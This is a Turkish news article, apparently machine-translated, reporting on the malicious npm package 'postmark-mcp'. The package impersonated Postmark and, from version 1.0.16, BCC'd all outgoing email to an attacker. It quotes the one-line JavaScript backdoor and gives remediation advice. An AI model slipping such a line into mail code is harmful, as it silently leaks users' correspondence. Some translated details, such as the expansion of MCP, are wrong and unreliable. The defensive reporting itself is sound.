NPM ekosistemine yeni keşfedilen bir saldırı, postmark ile taklit eden kötü niyetli bir pakete gömülü aldatıcı bir arka kapıyı ortaya çıkardı.
Postmark-MCP olarak adlandırılan paket, şüphesiz geliştiricilerden ve kuruluşlardan binlerce e-postayı sessizce sifonladı, hepsi sadece bir kod satırına sahip.
15 artımlı sürüm boyunca, Postmark-MCP’nin arkasındaki tehdit aktörü, Postmark’ın resmi adlandırma sözleşmelerini ve sürümleme stratejisini taklit ederek güvenilirlik yarattı.
Zararsız özellikler ve rutin güncellemelerle, kullanıcılar paketi kademeli olarak iş akışlarına entegre ettiler.
Saldırgan 1.0.16 sürümüne kadar gizli bir arka kapı tanıttı: her giden e -postayı saldırganın kontrolü altındaki harici bir sunucuya atan tek bir JavaScript ifadesi.
javascriptmailOptions.bcc="[email protected]";
Bu basit ekleme, sahte MCP (posta ve toplama protokolü) sunucusundan gönderilen her mesajın düşmana kopyalanmasını sağlayarak, görünür bir kurcalama belirtisi olmadan binlerce e -postanın pessasyonuna yol açtı.
Postmark’ın Postmark-MCP paketine veya kötü niyetli işlevselliğine kesinlikle katılmadığı altını çizmek çok önemlidir.
Meşru postmark API ve sunucuları tavizsiz ve tamamen güvenli kalır. Postmark hiçbir zaman NPM’de “Postmark-MCP” adlı bir modül yayınlamamış ve şirket herhangi bir üçüncü tarafa bunu yapmaya yetkilendirmemiştir.
Olayların Zaman Çizelgesi
- İlk sürümler (1.0.0-1.0.15): Paket düzenli olarak yayınlandı ve güncellendi, e -posta işleme için bir rahatlık kütüphanesi kisvesi altında mütevazı çekiş kazandı.
- Backdoor Giriş (sürüm 1.0.16): BCC giden mesajlara saldırgan kontrollü bir adrese eklenen tek satırlı ekleme.
- Tespit ve yayından kaldırma: Araştırmacılar ve açık kaynaklı koruyucular şüpheli ağ çağrılarını işaretledi. Kötü niyetli paket NPM’den kaldırıldı.
Bu olay, üçüncü taraf paketlere güvenmenin doğasında var olan, özellikle de yerleşik markaları taklit eden riskleri vurgulamaktadır.
Küçük kod değişiklikleri bile, değişiklik günlüklerinde neredeyse hiç ayak izi olmadan hassas verileri tehlikeye atarak ciddi güvenlik açıkları getirebilir.
Şimdi ne yapmalısın
Projeniz Postmark-MCP’yi daha önce yüklediyse, aşağıdaki adımları hemen alın:
- Paketi kaldır: Tüm ortamlardan Postmark-MCP’yi kaldırın, CI/CD boru hatları ve dağıtım komut dosyaları.
- E -posta günlüklerini denetleyin: Bilinmeyen BCC girişleri veya olağandışı SMTP trafiği için gönderme kayıtlarını inceleyin.
- Kimlik bilgilerini döndür: Uzlaşma penceresi sırasında e -posta ile herhangi bir API anahtar, kimlik doğrulama jetonu veya diğer kimlik bilgileri iletildiyse, bir kerede bunları yenileyin.
- Bağımlılıkları inceleyin: Gibi araçları benimseyin
npm auditveya benzer şekilde adlandırılan taklitçileri tespit etmek için üçüncü taraf bağımlılık tarayıcıları.
Tedarik zincirinizi korumak
API Integrity ve Geliştirici Trust, yazılım işlemlerini güvence altına almak için temeldir. Postmark ile entegre ederken, her zaman resmi posta SDK’larını kullanın.
Postmark-MCP olayı, tedarik zinciri güvenliğinin sürekli uyanıklık gerektirdiğini kesin bir hatırlatma görevi görüyor.
Postmark veya diğer güvenilir hizmetleri temsil ettiğini iddia eden, neden olmayan üçüncü taraf modüllere güvenmeyin. Bağımlılıkları entegre etmeden önce her zaman paket adlarını, depo bağlantılarını ve yayıncı güvenilirliğini doğrulayın.
Tek bir kötü niyetli çizgi bile ölçekte tahribat yaratabilir. Sıkı bağımlılık hijyenini koruyarak, otomatik güvenlik taramalarından yararlanarak ve resmi araçlara bağlı kalarak, kalkınma ekipleri açık bir şekilde gizlenen gizli tehditlere karşı koruyabilir.
Postmark, geliştirici topluluğunu şeffaf, güvenli API’lerle desteklemeye kararlıdır ve yanıltıcı veya zararlı taklitler için NPM kayıt defterini izlemeye devam edecektir. Devam eden güncellemeler ve en iyi uygulamalar için Postmark Durum sayfasına ve güvenlik bültenine abone olun.
Anında güncellemeler almak ve GBH’yi Google’da tercih edilen bir kaynak olarak ayarlamak için bizi Google News, LinkedIn ve X’te takip edin.